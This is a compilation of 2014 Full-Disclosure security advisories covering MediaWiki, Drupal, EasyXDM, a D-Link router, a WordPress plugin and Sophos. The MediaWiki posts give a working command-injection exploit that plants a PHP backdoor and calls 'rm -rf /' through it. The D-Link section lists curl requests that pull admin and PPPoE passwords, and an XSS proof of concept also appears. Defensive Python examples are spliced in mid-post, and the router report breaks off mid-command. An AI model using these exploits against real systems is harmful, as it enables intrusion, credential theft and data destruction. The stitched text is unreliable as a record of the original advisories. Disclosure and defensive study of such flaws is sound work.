[Full-disclosure] Jetro Cockpit Secure Browsing vulnerability - remote code execution on all enterprise workstations simultaneously
A critical vulnerability was discovered in Jetro Cockpit Secure Browsing, a popular enterprise secure browsing solution. The vulnerability allows simultaneous remote code execution into all the enterprise workstations using the product. The vulnerability is unique in that it breaks the basic value proposition of the security product in which it is found.

Full disclosure and details here: http://blog.quaji.com/2014/02/remote-code-execution-on-all-enterprise.html

Ronen Zilberman

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [SECURITY] [DSA 2851-1] drupal6 security update
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

- -------------------------------------------------------------------------
Debian Security Advisory DSA-2851-1                   secur...@debian.org
http://www.debian.org/security/                       Salvatore Bonaccorso
February 02, 2014                      http://www.debian.org/security/faq
- -------------------------------------------------------------------------

Package        : drupal6
Vulnerability  : impersonation
Problem type   : remote
Debian-specific: no
CVE ID         : CVE-2014-1475

Christian Mainka and Vladislav Mladenov reported a vulnerability in the OpenID module of Drupal, a fully-featured content management framework. A malicious user could exploit this flaw to log in as other users on the site, including administrators, and hijack their accounts.

These fixes require extra updates to the database which can be done from the administration pages.

For the oldstable distribution (squeeze), this problem has been fixed in version 6.30-1.

We recommend that you upgrade your drupal6 packages.

Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1

iQIcBAEBCgAGBQJS7qNRAAoJEAVMuPMTQ89EYqoP+wUL/5MNsjxndj/ospigHtTS
GzPc9HGxU7FYHKn2b8+rkdpXrbHer1CV+tO8aNj74oEf7ogfpq+VnPxzfyUkTt+U
q11pYx5R+mAfTbRktMcQJDCxKvwfd/nwWSCnlDNHaA8YlvPmLIPHXlUR5NEVJLAy
aixManZInNlkwNxLmBoC4vuy8boa5lD3iV6YzQk61utJsgshLytVZIxAnA1hz+kl
GEwubJHjop0j4Aqc8hZYvHWjJYHoNANYGAT8TRZ2fhgjkNEqKbooU6BME1MxxgeI
9hnB7xj37tR2T+p6KVaNIg3zeM1LVrbqKFALszkxqZFgpIIaesPGCLAfn0UCCqL1
vMHW0G4mzytL0F8hG11XbW3rJCkddleIy+2nKur5YA5dkYINve9GhX8MWG40wxXc
RQmou8HbFQcQZ8X9aNmWb1VMBnJkmw5M4ldp/J3vceRvPbpTer5a0U/0637AmGgD
ipe9Zv2JahhEZmbT+stdC+3YH5VXeUB6BQf0/xhbb01XYFT7c8FAe3z0vwKaq+6Q
S6OzU9TzscX6NVIYx+KYSDinlsocv5yatDBttucBRr/NBvUhLQYmTQr5g2STZmEZ
Hlyob+PKW49Fax8qVmlilSkQ9A9+D7C7eskl6nmS/CFzfLaHsj+EDGEU6sSp67Jf
R/h1N5OfP462uBf1vXMG
=D+VD
-----END PGP SIGNATURE-----
[Full-disclosure] Revision 1 (PoC added): MediaWiki <= 1.22.1 PdfHandler Remote Code Execution Exploit (CVE-2014-1610)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

#
# MediaWiki <= 1.22.1 PdfHandler Remote Code Execution Exploit (CVE-2014-1610)
# Reported by Netanel Rubin - Check Point's Vulnerability Research Group (Jan 19, 2014)
# Fixed in 1.22.2, 1.21.5 and 1.19.11 (Jan 30, 2014)
# Affected website : Wikipedia.org and more !
#
# Exploit author : Xelenonz & @u0x (Pichaya Morimoto)
# Release dates : Feb 1, 2014
# Special Thanks to 2600 Thailand !
#

# Exploit:
1. upload Longcat.pdf to wikimedia cms site (with PDF Handler enabled)
   http://vulnerable-site/index.php/Special:Upload
2. inject os cmd to upload a php-backdoor
   http://vulnerable-site/thumb.php?f=Longcat.pdf&w=10|`echo%20 "images/xnz.php`
3. access to php-backdoor!
   http://vulnerable-site/images/xnz.php?1=rm%20-rf%20%2f%20--no-preserve-root
4. happy pwning!!

# Related files:
thumb.php                                    <-- extract all _GET array to params
/extensions/PdfHandler/PdfHandler_body.php   <-- failed to escape w/width options
/includes/media/ImageHandler.php
/includes/GlobalFunctions.php
/includes/filerepo/file/File.php

# Vulnerability Analysis:
1. thumb.php
   This script used to resize images if it is configured to be done when the web browser requests the image

    transform( $params, File::RENDER_NOW ); // << resize image by width/height
    ...
    // Stream the file if there were no errors
    $thumb->streamFile( $headers );
    ...
    ?>

2. /includes/filerepo/file/File.php

    getHandler(); // << PDF Handler
    ...
    $normalisedParams = $params;
    $handler->normaliseParams( $this, $normalisedParams );
    ...
    $thumb = $handler->doTransform( $this, $tmpThumbPath, $thumbUrl, $params );
    ..
    ?>

3. /extensions/PdfHandler/PdfHandler_body.php

    &1";
    ...
    $err = wfShellExec( $cmd, $retval );
    ...
    ?>

4. /includes/GlobalFunctions.php
   Execute a shell command, with time and memory limits

Error generating thumbnail
Error generating thumbnail
เกิดปัญหาไม่สามารถทำรูปย่อได้: /bin/bash: -: command not found
convert: option requires an argument `-resize' @ error/convert.c/ConvertImageCommand/2380.
GPL Ghostscript 9.10: Unrecoverable error, exit code 1

GET /mediawiki1221/images/longcat.php?1=id HTTP/1.1
Host: 127.0.0.1
Connection: keep-alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Cookie: my_wikiLoggedOut=1391266363; my_wikiUserID=2; my_wikiUserName=Longcat; my_wiki_session=bvg0n4o0sn6ug04lg26luqfcg1

uid=33(www-data) gid=33(www-data) groups=33(www-data)

# Back-end $cmd
GlobalFunctions.php : wfShellExec()
cmd = ('gs' -sDEVICE=jpeg -sOutputFile=- -dFirstPage=1 -dLastPage=1 -r150 -dBATCH -dNOPAUSE -q '/var/www/mediawiki1221/images/2/27/Longcat.pdf' | '/usr/bin/convert' -depth 8 -resize 10|`echo "images/longcat.php` - '/tmp/transform_0e377aad0e27-1.jpg') 2>&1

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.14 (GNU/Linux)

iQIcBAEBAgAGBQJS7SLLAAoJEB2kHapd1XMU8BcP/A+hMUw/EDwChN+2XjtExVGU
BzPrpXXBbp6WGWkeztmrT78Y1b1lXX/cQA4V9IGrdHUEdgG0p3y476d7eZ5sPxVf
ny9Xg7o4WtMgmSvSOOc+lCsy9aAKab801cs1HLbwZokwK8ItwQQoGfik0BgNQ4l1
mijELis1z1f3k6yJ9/OJicnIJDmHIzPL9wQyr2A5c+jjz74SR//SlQPrqDbvEpj2
uCCpTpjf6LGYCzyGmqROlf+OxFTeXdB9oghButrEtQ9w6qGQg1/UZjmbx/xLkCqb
GO1R4qs0PuV4uepwcbLzDDWW5kPejPjcwpuyjrpQO45OcIUtkvzR4iypCxxkvktv
n2l09Dtn9HqbK3QXhTb2u3uhM9RyJd7kFKhfmZ85OnvMmYvaXSeDWs7Wd9GEO5wh
FXbhL9O2u/bqiabQKnsJ6bx8hcm2a9mO+/yJZUyBXybHrjseRD4LQFWUYR/WPAQt
vuICIQyO5pcjkIib+0DN4e7xcFMYuo3o6WkSZuZT+l0LwYDVmhUbaGAEP13+dWZZ
M0HGoI7AITsqukYFH1n7NYjJazF3Bckc0iJbCrI39TYkvr3V9bRWSEfVBM6FcBan
kumwDlzYP/301fsKGLtfsnUmK2qkj1EF3DVoJbZ5VFdgiUSlCMsbp9qdGfUPbelR
2LmeyQR2rzjBB7Sovvcn
=ooEs
-----END PGP SIGNATURE-----
[Full-disclosure] MediaWiki <= 1.22.1 PdfHandler Remote Code Execution Exploit (CVE-2014-1610)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

#
# MediaWiki <= 1.22.1 PdfHandler Remote Code Execution Exploit (CVE-2014-1610)
# Reported by Netanel Rubin - Check Point's Vulnerability Research Group (Jan 19, 2014)
# Fixed in 1.22.2, 1.21.5 and 1.19.11 (Jan 30, 2014)
# Affected website : Wikipedia.org and more !
#
# Exploit author : Xelenonz & @u0x (Pichaya Morimoto)
# Release dates : Feb 1, 2014
# Special Thanks to 2600 Thailand !
#

# Exploit:
1. upload Longcat.pdf to wikimedia cms site (with PDF Handler enabled)
   http://vulnerable-site/index.php/Special:Upload
2. inject os cmd to upload a php-backdoor
   http://vulnerable-site/thumb.php?f=Longcat.pdf&w=10|`echo%20 "images/xnz.php`
3. access to php-backdoor!
   http://vulnerable-site/images/xnz.php?1=rm%20-rf%20%2f%20--no-preserve-root
4. happy pwning!!

# Related files:
thumb.php                                    <-- extract all _GET array to params
/extensions/PdfHandler/PdfHandler_body.php   <-- failed to escape w/width options
/includes/media/ImageHandler.php
/includes/GlobalFunctions.php
includes/filerepo/file/File.php

# Vulnerability Analysis:
1. thumb.php
   This script used to resize images if it is configured to be done when the web browser requests the image

    transform( $params, File::RENDER_NOW ); // << resize image by width/height
    ...
    // Stream the file if there were no errors
    $thumb->streamFile( $headers );
    ...
    ?>

2. /includes/filerepo/file/File.php

    getHandler(); // << PDF Handler
    ...
    $normalisedParams = $params;
    $handler->normaliseParams( $this, $normalisedParams );
    ...
    $thumb = $handler->doTransform( $this, $tmpThumbPath, $thumbUrl, $params );
    ..
    ?>

3. /extensions/PdfHandler/PdfHandler_body.php

    &1";
    ...
    $err = wfShellExec( $cmd, $retval );
    ...
    ?>

4. /includes/GlobalFunctions.php
   Execute a shell command, with time and memory limits
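The analysis above follows the `w` parameter from thumb.php through `normaliseParams()` into the command string handed to `wfShellExec()`. The Python model below is an added example, not MediaWiki code: `build_thumb_cmd_unsafe()` reproduces the defect class (a request value interpolated into a shell string), while `normalise_width()` and `build_thumb_argv()` show the corresponding fix, a strict integer check plus per-stage argv lists that are executed without any shell. The function names, the five-digit bound and the `out.jpg` output path are assumptions of this example.

```python
# Width-parameter handling modelled on the thumb.php -> File::transform ->
# PdfHandler::doTransform -> wfShellExec path described in the advisory above.
# Added example: these functions are illustrative and are not MediaWiki's API.
import re
import subprocess

# Accept only a plain positive integer of at most five digits. Rejecting
# anything else before it reaches a command line removes the injection
# surface and also bounds the amount of work ImageMagick is asked to do.
_WIDTH_RE = re.compile(r"^[1-9][0-9]{0,4}$")


def build_thumb_cmd_unsafe(pdf_path, width):
    # The defect class: a raw request value is pasted into a shell string,
    # so shell syntax inside `width` is interpreted by /bin/sh.
    return ("gs -sDEVICE=jpeg -sOutputFile=- -q '%s' | convert -depth 8 -resize %s - out.jpg"
            % (pdf_path, width))


def normalise_width(raw):
    """Return the validated integer width, or None when the value is unacceptable."""
    if not isinstance(raw, str) or _WIDTH_RE.match(raw) is None:
        return None
    return int(raw)


def build_thumb_argv(pdf_path, width_raw):
    """Return (gs_argv, convert_argv), or None when the width is rejected.

    Each stage is an argv list run without a shell, so no request byte is
    ever parsed as shell syntax, independently of the validation above."""
    width = normalise_width(width_raw)
    if width is None:
        return None
    gs_argv = ["gs", "-sDEVICE=jpeg", "-sOutputFile=-", "-dFirstPage=1",
               "-dLastPage=1", "-r150", "-dBATCH", "-dNOPAUSE", "-q", pdf_path]
    convert_argv = ["convert", "-depth", "8", "-resize", str(width), "-", "out.jpg"]
    return gs_argv, convert_argv


def run_thumb_pipeline(pdf_path, width_raw):
    """Run the two stages joined by a pipe with no shell involved.

    Needs gs and ImageMagick installed; returns convert's exit status."""
    argvs = build_thumb_argv(pdf_path, width_raw)
    if argvs is None:
        raise ValueError("width must be a positive integer")
    gs_argv, convert_argv = argvs
    gs = subprocess.Popen(gs_argv, stdout=subprocess.PIPE)
    conv = subprocess.Popen(convert_argv, stdin=gs.stdout)
    gs.stdout.close()  # let gs get SIGPIPE if convert exits early
    status = conv.wait()
    gs.wait()
    return status
```

The two defences are independent: the integer check stops the malformed value at the parameter layer, and building argv lists means that even a validation gap elsewhere cannot reach a shell parser.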
[Full-disclosure] [CVE-2014-1403] DOM XSS in EasyXDM 2.4.18
Affected products
=================
easyXDM library < 2.4.19 - http://easyxdm.net/wp/

easyXDM is a Javascript library that enables you as a developer to easily work around the limitation set in place by the Same Origin Policy, in turn making it easy to communicate and expose javascript API's across domain boundaries.

Vulnerabilities are fixed in version 2.4.19. All users are advised to upgrade.

CVE
===
CVE-2014-1403 DOM XSS in name.html location.hash value

Description
-----------
EasyXDM uses the name.html file to bootstrap cross origin communication between documents. It accepts various parameters in the location.hash value, one of which is the URL of the document to load. The value of this parameter is not filtered, allowing to pass a javascript: URL that may execute arbitrary Javascript code in the context of the domain hosting the EasyXDM installation.

This vulnerability is described in greater detail in [1].

Analysis
--------
The root cause of the vulnerability is the following code in the name.html file:

    if (location.hash) { // DOM XSS source
        if (location.hash.substring(1, 2) === "_") {
            var channel, url,
                hash = location.href.substring(location.href.indexOf("#") + 3),
                indexOf = hash.indexOf(",");
            if (indexOf == -1) {
                channel = hash;
            } else {
                channel = hash.substring(0, indexOf);
                url = decodeURIComponent(hash.substring(indexOf + 1));
            }
            switch (location.hash.substring(2, 3)) {
            //...
            case "3": // NameTransport remote
                var guest = window.parent.frames["easyXDM_" + channel + "_provider"];
                if (!guest) {
                    throw new Error("unable to reference window");
                }
                guest.easyXDM.Fn.get(channel)(window.name);
                location.href = url + "#_4" + channel + ","; // DOM XSS sink
                break;

Part of the location hash, under certain conditions, ends up in the location.href assignment, triggering JS execution.
Proof of Concept
----------------
http://domain/example/bridge.html"; onload="document.getElementById('f').src='http://domain/name.html#_3constructor,javascript:alert(document.domain)//';">

Credits
=======
Vulnerability found by Krzysztof Kotowicz http://blog.kotowicz.net

Timeline
--------
- 2013-01-xx - Discovery
- 2013-01-10 - Notified project maintainer
- 2013-01-19 - Fixed version release
- 2013-01-31 - Public disclosure

Related links
=============
[1] http://blog.kotowicz.net/2014/01/xssing-with-shakespeare-name-calling.html
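The name.html snippet in the Analysis section parses `channel` and `url` out of `location.hash` and assigns `url` to `location.href` without ever looking at its scheme. The Python below is an added example, not easyXDM code: it replicates that parsing so the proof-of-concept hash can be traced step by step, and adds the scheme allowlist the original lacked. `parse_name_hash`, `safe_redirect_target` and `next_location` are names chosen for this example.

```python
# Model of name.html's location.hash handling with the missing scheme check.
# Added example, not easyXDM code; the function names are this example's own.
from urllib.parse import unquote, urlsplit

# Only absolute http(s) URLs may be assigned to location.href.
SAFE_SCHEMES = ("http", "https")


def parse_name_hash(href):
    """Replicate name.html: after "#_<mode>", split at the first comma into
    (channel, url). Returns (mode, channel, url) or None if not an easyXDM hash."""
    i = href.find("#")
    if i == -1 or href[i + 1:i + 2] != "_":
        return None
    mode = href[i + 2:i + 3]
    rest = href[i + 3:]          # same as location.href.substring(indexOf("#") + 3)
    comma = rest.find(",")
    if comma == -1:
        return mode, rest, None
    return mode, rest[:comma], unquote(rest[comma + 1:])


def safe_redirect_target(url):
    """Return url only if its parsed scheme is http or https, else None.

    Checking the parsed scheme against an allowlist (rather than denylisting a
    'javascript:' prefix) also rejects upper-case or otherwise disguised
    variants, and rejects unknown schemes by default."""
    if url is None:
        return None
    parts = urlsplit(url.strip())
    if parts.scheme.lower() not in SAFE_SCHEMES or not parts.netloc:
        return None
    return url


def next_location(href):
    """Compute the location.href that case "3" would assign, or None when blocked."""
    parsed = parse_name_hash(href)
    if parsed is None or parsed[0] != "3":
        return None
    _, channel, url = parsed
    target = safe_redirect_target(url)
    if target is None:
        return None
    return target + "#_4" + channel + ","
```

Run with the proof-of-concept hash above, `next_location()` returns `None` because the parsed scheme is `javascript`; with a percent-encoded `https://` provider URL it returns the same value the original sink would have assigned.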
[Full-disclosure] Router D-Link DIR-100 Multiple Vulnerabilities
tl;dr: You could simply `ask` the D-Link DIR-100-D1 for the administrator password.

Report is also available at: http://pigstarter.krebsco.de/report/2013-12-18_dir100.txt

Enjoy

* Title: Router D-Link DIR-100 Multiple Vulnerabilities
* Date: 2013-12-18
* Author: Felix Richter
* Contact: r...@euer.krebsco.de
* Vulnerable Software: ftp://ftp.dlink.de/dir/dir-100/driver_software/DIR-100_fw_revd_403b07_ALL_de_20120410.zip
* Patched Software: ftp://ftp.dlink.de/dir/dir-100/driver_software/DIR-100_fw_revd_403b13_ALL_de_20131011.zip
* Report Version: 2.0
* Report URL: http://pigstarter.krebsco.de/report/2013-12-18_dir100.txt
* Vulnerable: D-Link DIR-100
* Hardware Revision: D1
* Software Version: 4.03B07 (from 2012-04-10)
* CVE Numbers:
  * CWE-287 Authentication Issues: CVE-2013-7051
  * CWE-255 Issues with Credential Management: CVE-2013-7052
  * CWE-352 Cross-Site Request Forgery: CVE-2013-7053
  * CWE-79 Cross-Site Scripting: CVE-2013-7054
  * CWE-200 Information Disclosure: CVE-2013-7055
* Google Dork: "D-Link Systems" inurl:bsc_internet.htm D1
* State: Patched by Vendor
* Link to Vendor Report: http://more.dlink.de/sicherheit/news.html#news8

# Table of Contents

1. Background
2. Vulnerability Description
3. Technical Description
4. Severity and Remediation
5. Timeline

# 1. Background

The DIR-100 is designed for easy and robust connectivity among heterogeneous standards-based network devices. Computers can communicate directly with this router for automatic opening and closing of UDP/TCP ports to take full advantage of the security provided without sacrificing functionality of on-line applications.
# 2 Vulnerability Description

Multiple vulnerabilities have been found in the D-Link DIR-100 Ethernet Broadband Router Revision D (and potentially other devices sharing the affected firmware) that could allow a remote attacker to:

- Retrieve the administrator password without authentication, leading to authentication bypass [CWE-255]
- Retrieve sensitive configuration parameters like the PPPoE username and password without authentication [CWE-200]
- Execute privileged commands without authentication through a race condition, leading to weak authentication enforcement [CWE-287]
- Send a formatted request to a victim, which will then execute arbitrary commands on the device (CSRF) [CWE-352]
- Store arbitrary JavaScript code which will be executed when a victim accesses the administrator interface [CWE-79]

CVE numbers for these vulnerabilities have not yet been assigned.

# 3 Technical Description of the Vulnerabilities

## 3.0 The DIR-100 Web Interface and CGI

The DIR-100 web interface provides a CGI script at `/cliget.cgi` for unauthenticated users and `/cli.cgi` for authenticated requests. The list of features provided by each CGI script can be retrieved with:

    curl 'http://192.168.1.104/cliget.cgi?cmd=help'
    # and respectively when authenticated
    curl 'http://192.168.1.104/cli.cgi?cmd=help'

## 3.1 Authentication Bypass

### Description

The administrator password is not protected in any way on the device from any attacker with access to the administrator interface, which listens on port 80. The request that retrieves the administrator password does not need to be authenticated.
### Proof of Concept

The web interface provides two distinct ways to retrieve the administrator password:

    curl 'http://192.168.0.1/cliget.cgi?cmd=$sys_user1'
    curl 'http://192.168.0.1/cliget.cgi?cmd=easysetup%20summary'

## 3.2 Weak Authentication

### Description

As soon as a user is logged into the administration interface, the cli CGI is `unlocked` and can be used without authenticating beforehand, as the CGI script does not check any other authentication parameters such as cookies or HTTP parameters. The only access check is whether the IP address is the same.

### Proof of Concept

    # open the router interface in a web browser and log in
    firefox 'http://192.168.0.1/'
    # open a new terminal or another web-browser which is currently not logged
    # in and try to access
    curl 'http://192.168.0.1/cli.cgi?cmd=help'
    # this request will be authenticated and it will not be redirected to the
    # login page. If no user is logged in, the request will be redirected to
    # the login

## 3.3 Retrieve sensitive information

### Description

Besides retrieving the administrator password without authentication, it is possible to retrieve other sensitive configuration from the device as well, like the PPTP and PPPoE username and password, the configured DynDNS username and password, and the configured mail log credentials, when these parameters are configured. No authentication is required.

### Proof of Concept

    curl 'http://192.168.0.1/cliget.cgi?cmd=$ddns1'
    curl 'http://192.168.0.1/cliget.cgi?cmd=$poe_user'
    curl 'http://192.168.0.1/cliget.cgi?cmd=$poe_pass'
    curl 'http://192.168.0.1/cli
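Both this report and the MediaWiki PdfHandler advisory earlier on the page describe requests that leave a clear trace in a web access log: a thumb.php size parameter containing shell syntax, and `/cliget.cgi` commands that return credentials. The detector below is an added example, not code from either advisory. It assumes the requests are visible in a combined-format log (for instance from a reverse proxy in front of the wiki, or an IDS HTTP decoder watching the router's LAN segment); the log lines are constructed for the example and the rule names are illustrative.

```python
# Access-log rules for the two request patterns documented on this page:
# shell syntax in thumb.php's size parameters (MediaWiki, CVE-2014-1610) and
# unauthenticated credential reads through /cliget.cgi (D-Link DIR-100).
# Added example; the log lines are constructed and the rule names are
# illustrative. It assumes combined-format log input.
import re
from urllib.parse import parse_qs, urlsplit

SAMPLE_LOG = """\
10.0.0.5 - - [01/Feb/2014:10:00:01 +0000] "GET /thumb.php?f=Longcat.pdf&w=120 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.9 - - [01/Feb/2014:10:00:02 +0000] "GET /thumb.php?f=Longcat.pdf&w=10|%60echo%20x%60 HTTP/1.1" 500 312 "-" "curl/7.35"
192.168.0.7 - - [18/Dec/2013:09:12:44 +0100] "GET /cliget.cgi?cmd=help HTTP/1.1" 200 900 "-" "curl/7.33"
192.168.0.7 - - [18/Dec/2013:09:12:45 +0100] "GET /cliget.cgi?cmd=$sys_user1 HTTP/1.1" 200 64 "-" "curl/7.33"
192.168.0.7 - - [18/Dec/2013:09:12:46 +0100] "GET /cliget.cgi?cmd=easysetup%20summary HTTP/1.1" 200 2048 "-" "curl/7.33"
192.168.0.8 - - [18/Dec/2013:09:13:00 +0100] "GET /bsc_internet.htm HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

SHELL_META = re.compile(r"[|;&`$<>(){}]")
SIZE_PARAMS = ("w", "width", "h", "height")
# cliget.cgi commands the DIR-100 report lists as returning secrets.
DIR100_SECRET_CMDS = {"$sys_user1", "easysetup summary", "$ddns1", "$poe_user", "$poe_pass"}


def parse_line(line):
    """Parse one combined-format line into a dict; None if it does not match."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    rec = m.groupdict()
    url = urlsplit(rec["target"])
    rec["path"] = url.path
    # parse_qs percent-decodes values, so an encoded %60 is seen as a backtick.
    rec["query"] = parse_qs(url.query, keep_blank_values=True)
    return rec


def classify(rec):
    """Return the rule names that fire on one parsed record."""
    hits = []
    if rec["path"].endswith("/thumb.php"):
        values = [v for p in SIZE_PARAMS for v in rec["query"].get(p, [])]
        if any(SHELL_META.search(v) for v in values):
            hits.append("thumb_size_param_shell_metachar")
        elif not all(v.isdigit() for v in values):
            hits.append("thumb_size_param_not_numeric")
    if rec["path"].endswith("/cliget.cgi"):
        if any(v in DIR100_SECRET_CMDS for v in rec["query"].get("cmd", [])):
            hits.append("dir100_unauth_credential_read")
    return hits


def scan(log_text):
    """Return (ip, target, rules) for every line that triggers at least one rule."""
    alerts = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is not None:
            rules = classify(rec)
            if rules:
                alerts.append((rec["ip"], rec["target"], rules))
    return alerts
```

Matching on the decoded parameter value rather than the raw URL is what catches the percent-encoded backtick; the numeric fallback rule is lower confidence but surfaces probing that uses characters outside the metacharacter set.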
[Full-disclosure] Bypass the Stop User Enumeration WordPress Plugin
Stop User Enumeration is a WordPress plugin that provides protection against an unauthenticated attacker gaining a list of all WordPress users. This information can aid an attacker in further attacks against the website, including brute-force password guessing attacks. This can be performed using wp-scan.

Homepage: http://wordpress.org/plugins/stop-user-enumeration/
Version: 1.2.4 (latest)

According to the full disclosure methodology I have publicly disclosed this at the same time as notifying the vendor.

Advisory
--------
An attacker can bypass the username enumeration protection by using POST requests. The protection currently only stops GET requests to enumerate users. By sending POST requests with the body of "author=1" and incrementing the number over successive requests, the entire set of WordPress users can be enumerated. The WordPress user information is disclosed in the HTML response body, unlike being disclosed in the redirect header, as with GET requests.

1.
POST / HTTP/1.1
Host: www.wordpress.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 8

author=1

Andrew Horton (urbanadventurer)
www.morningstarsecurity.com
Visit my meta-aggregator of security news at http://www.morningstarsecurity.com/news/
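The bypass above comes down to the plugin inspecting `author` only in the query string of GET requests. The Python below is an added example, not the plugin's code: it parses a raw request like the one in the advisory and contrasts the GET-only check with one that reads the parameter from any method, including a form-encoded POST body. The function names are this example's own.

```python
# GET-only versus method-independent detection of the `author` parameter,
# modelled on the bypass described above. Added example, not the plugin's code.
from urllib.parse import parse_qs, urlsplit


def parse_http_request(raw):
    """Split a raw HTTP/1.1 request into (method, target, headers, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, target, _ = lines[0].split(" ", 2)
    headers = {}
    for h in lines[1:]:
        name, _, value = h.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, target, headers, body


def author_param_get_only(method, target, headers, body):
    """The behaviour the advisory describes: only GET query strings are inspected."""
    if method != "GET":
        return False
    return "author" in parse_qs(urlsplit(target).query)


def author_param_any_method(method, target, headers, body):
    """Hardened check: the query string is inspected for every method, and a
    form-encoded body is inspected too, so POST author=N is caught as well."""
    if "author" in parse_qs(urlsplit(target).query):
        return True
    ctype = headers.get("content-type", "").split(";")[0].strip().lower()
    if ctype == "application/x-www-form-urlencoded":
        return "author" in parse_qs(body)
    return False


def is_user_enumeration(raw):
    """Convenience wrapper: parse a raw request and apply the hardened check."""
    return author_param_any_method(*parse_http_request(raw))


# Constructed samples: the POST from the advisory and its GET counterpart.
SAMPLE_POST = ("POST / HTTP/1.1\r\nHost: www.wordpress.com\r\n"
               "Content-Type: application/x-www-form-urlencoded\r\n"
               "Content-Length: 8\r\n\r\nauthor=1")
SAMPLE_GET = "GET /?author=1 HTTP/1.1\r\nHost: www.wordpress.com\r\n\r\n"
```

The same `parse_qs` lookup applied to the body is all the fix requires; a request whose body carries a different content type is left alone, since WordPress itself would not populate `author` from it.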
[Full-disclosure] CVE-2014-1610 description incorrect
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-1610

It states that authentication is required to exploit this and this is not true. What does require authentication usually is uploading the file. If there is already a djvu file that has been uploaded by another user, you do not need authentication to exploit this.

https://gist.github.com/brandonprry/8746891

I believe this should be revised as the exploit itself does not require authentication. I think that will also result in a score change as well.

--
http://volatile-minds.blogspot.com -- blog
http://www.volatileminds.net -- website
[Full-disclosure] CVE-2014-1213 - Denial of Service in Sophos Anti Virus
Vulnerability title: Denial of Service in Sophos Anti Virus
CVE: CVE-2014-1213
Vendor: Sophos
Product: Anti Virus
Version: 10.0.11/Engine 3.48.x
Reported by: Graham Sutherland

Details:
The following system objects do not have access control lists (ACLs) set, thus allowing any user to access and manipulate them:

Global objects (in namespace \Global, a.k.a. \BaseNamedObjects):
$$!_EVENT_$!__
$$!_EVENT_$!__DataUpdateRequest
$$!_EVENT_$!__MmfMutexSAV-
$$!_EVENT_$!__MmfMutexSAV-Info
$$!_EVENT_$!__ReadyForUpdateSAV-
$$!_EVENT_$!__ReadyForUpdateSAV-Info
$$!_EVENT_$!__SAV-
$$!_EVENT_$!__SAV-Info
$$!_EVENT_$!__StateChange
$$!_EVENT_$!__SuspendedSAV-
$$!_EVENT_$!__SuspendedSAV-Info
$$!_EVENT_$!__UpdateComplete
$$!_EVENT_$!__UpdateMutex
$$!_EVENT_$!__UpdateRequest
$$!_MMMF_$!__ SAV- SAV-Info

Session objects (in namespace \Sessions\n\BaseNamedObjects):
SophosALMonSessionInstance

Further details at:
http://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-1213/

Copyright:
Copyright (c) Portcullis Computer Security Limited 2014, All rights reserved worldwide. Permission is hereby granted for the electronic redistribution of this information. It is not to be edited or altered in any way without the express written consent of Portcullis Computer Security Limited.

Disclaimer:
The information herein contained may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk. In no event shall the author/distributor (Portcullis Computer Security Limited) be held liable for any damages whatsoever arising out of or in connection with the use or spread of this information.